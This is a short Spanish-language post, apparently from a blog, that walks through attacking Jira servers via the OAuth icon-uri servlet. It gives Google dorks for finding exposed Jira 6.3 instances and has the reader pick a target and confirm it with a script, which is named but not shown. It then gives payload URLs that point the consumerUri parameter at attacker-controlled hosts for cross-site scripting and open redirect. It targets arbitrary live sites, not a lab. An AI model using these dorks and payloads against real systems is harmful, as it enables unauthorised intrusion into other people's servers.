Hola Lectores les comparto algo que encontré en unos writeups que agrego al final del post, para que los visiten y encuentren cosas muy interesantes.
1-Debemos de buscar nuestro target y aplicarle un reconocimiento del entorno.
2-Agregare algunas dorks para que les sea mas Ăºtil encontrar algunos sitios vulnerables.
site:com inurl:/jira/plugins/servlet/
site:jira.*.mx
site:*.com inurl:/JiraCreditsPage!default.jspa intext:JIRA 6.3
site:*.com inurl:/JiraCreditsPage!default.jspa intext:JIRA 6.3.*
3- Seleccionamos nuestro target.
4-Utilizamos el script para ver si es vulnerable o no.
5-Utilizamos nuestro payload.
http://sitevulnerable/plugins/servlet/oauth/users/icon-uri?consumerUri=http://hookxss
http://sitevulnerable/plugins/servlet/oauth/users/icon-uri?consumerUri=http://hookopenredirect
SCRIPT
Requerimientos:
sudo apt-get install figlet && sudo gem install lolcat
Thanks to https://medium.com/bugbountywriteup
